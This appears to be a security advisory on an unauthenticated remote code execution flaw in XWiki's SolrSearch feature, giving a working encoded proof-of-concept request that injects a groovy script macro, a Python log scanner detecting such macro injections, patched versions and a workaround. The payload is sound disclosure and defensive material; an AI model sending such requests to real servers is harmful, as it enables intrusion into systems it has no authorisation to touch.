XWiki Platform is a widely used wiki platform offering runtime services for various applications. However, a critical security vulnerability has recently been discovered which allows any guest to perform arbitrary remote code execution via a request to the SolrSearch feature. This issue poses a severe threat to the confidentiality, integrity, and availability of the entire XWiki installation.

Exploit Details

The exploit uses a malformed request to SolrSearch to trigger the remote code execution. Here is a sample request which reproduces the issue without logging in:

<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20

If the title of the returned RSS feed contains Hello from search text:42, it indicates that the XWiki instance is vulnerable to this attack.
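As an added defensive example (not part of the original write-up), the following Python scans web-server access logs for the request shape above: SolrSearch requests whose decoded text parameter carries XWiki macro syntax. The log lines are constructed; the pattern also covers XWiki's velocity and python script macros beyond the async/groovy pair used in the request above, which is an assumption that the same abuse path applies to them.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (Common Log Format), not real traffic;
# the first carries the encoded macro injection shown in the write-up.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Feb/2025:20:15:46 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22x%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 1834
198.51.100.3 - - [20/Feb/2025:20:16:02 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 5120
198.51.100.9 - - [20/Feb/2025:20:16:30 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 9921
"""

# Common Log Format request line: client IP and request target.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Macro openers/closers that have no place in a search string. async and groovy
# are used in the write-up; velocity and python are XWiki's other script macros.
MACRO_RE = re.compile(r"\{\{\s*/?\s*(groovy|async|velocity|python)\b", re.IGNORECASE)

def decode_param(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return a finding for a SolrSearch request carrying macro syntax, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not unquote(parts.path).endswith("/bin/get/Main/SolrSearch"):
        return None
    # parse_qs decodes one layer; decode_param strips any extra layers.
    for value in parse_qs(parts.query, keep_blank_values=True).get("text", []):
        text = decode_param(value)
        macros = sorted({name.lower() for name in MACRO_RE.findall(text)})
        if macros:
            return {"ip": m.group("ip"), "macros": macros, "text": text}
    return None

def scan_log(log_text):
    """Scan a whole access log; one finding per flagged request."""
    return [hit for hit in map(inspect_line, log_text.splitlines()) if hit]
```

Running scan_log(SAMPLE_LOG) flags only the first line, reporting the async and groovy macros found in its decoded text parameter.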

Official References

1. XWiki Security Advisory - The official advisory for this vulnerability, which provides further details and recommendations.

2. XWiki Patch Notes - Release notes for the latest patch versions, including security fixes.

Patching Recommendations

This vulnerability has been resolved in XWiki versions 15.10.11, 16.4.1, and 16.5.RC1. All users are strongly advised to upgrade to the latest version to protect their installations from this critical security flaw.

For those unable to upgrade immediately, a temporary workaround is available by making the following change in the Main.SolrSearchMacros file:

1. Replace the line with the rawResponse macro found in macros.vm#L2824.

2. Make sure the content type for this macro is set to application/xml.

3. Save and close the file.

Remember that this workaround is temporary and should not replace the upgrade process to a patched version of XWiki. Users are urged to perform the recommended upgrade as soon as possible to ensure the security and stability of their XWiki instances.

Timeline

Published on: 02/20/2025 20:15:46 UTC